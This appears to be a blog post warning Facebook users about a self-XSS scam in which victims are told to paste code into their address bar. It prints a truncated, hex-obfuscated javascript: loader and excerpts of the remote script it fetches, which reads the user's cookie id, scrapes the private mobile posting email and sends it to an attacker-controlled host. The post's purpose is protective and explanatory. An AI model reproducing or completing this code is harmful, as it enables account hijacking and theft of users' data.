Remain Safe from fraud and Identity Theft at Facebook



Recently i came through another java exploit at facebook, Its asked by the victim to put it in the address bar so that you may be given credits for the games, or like something that you will be the admin of the pages you like. But stop don't listen to him because its just the fraud and a cheap social engineering hack. I recently posted a trick on how to hack pages that is simple and also part of this trick but in the exploit it was just for hacking into page, But some hackers are trying to get cookies and mobile email of the victim also, by asking him to put that code in the bar of browser and to hit enter, thats more modified form of the exploit. Well, Hacking personal id's isn't a good job if you are doing this for bad cause and for fun purpose. Read my fanpages hack post to get into more detail.
What is personal publishing mobile email address for facebook:
Its a unique address for every profile and using it we can post statuses and photos etc on the go. We can also get this for any fan page also. Its something like uniqueword@m.facebook.com.

Which type of code hackers give to steal your personal email id and cookies?
Sometimes its simple like javascript: ........... but in most of the cases they obfuscate it so that you may not know that what is written in it and only broswer can understand it. Its ecoded in ASCII format. Well the basic purpose of obfuscated text is to prevent stealing of the source code of your hardwork and some companies use it for security. But it can also be used for hacking. If any one gives you some code like this below then beware don't put it in address bar since it will steal your cookies of facebook and as well as unique mobile email id for facebook. See code below:


javascript:var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3a\x2f\...........x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];varscript=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);
 (Note: I have cut some portion of script so that some other may not steal it to use it for wrong purpose.)
Yes its an obfuscated text command, Only browser and understand it, If i decode it i can get the path of the 3rd party hosted script. We can use any available online decoder like this see what i got:
http://www.new.........com/time/mobile.js

That is tha path of the real script, If we examine it then we shall come to know its function, Simply put the obtained path in the browser address bar and you will get information.
Some part of mobile.js:

//Append jquery library
var newjs = document.createElement('script');
newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
document.body.appendChild(newjs);
setTimeout(function(){
//Grab post form id and other stuff for posting
if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php")
{
alert("Wrong Page. You must paste the script into your browser's\n
address bar on any facebook tab or window.\n\n Then Hit Enter!");
return;
}
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
//grab mobiles
$.get("http://m.facebook.com/upload.php", function(data){
var mydata = data;
var mobiles;
var count = 0;
$($(mydata).find('a').filter(':contains("m.facebook.com")')).
.................
top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/
time/check.php?get=1&m=,'+insert;
});
},2000);
alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");

See the lines highlighted as red, These wiil appear as the alert in your broswer if you put that obfuscated java in your browser address bar, I haven't shown you the whole script here for security reasons, Another smart thing if you paste this somewhere other then facebook then it will apear: Wrong Page. You must paste the script into your browser's\naddress bar on any facebook tab or window.\n\n Then Hit Enter!


What to do if you followed the hacker's guide and inserted the script in the browser address bar?

Answer is quite simple just update your facebook Unique mobile email id.
1. Go to http://m.facebook.com/upload.php
2. Login by using facebook email and password.
3. Reset your email id by clicking Reset Address.

If you found this post informative then kindly share to friends.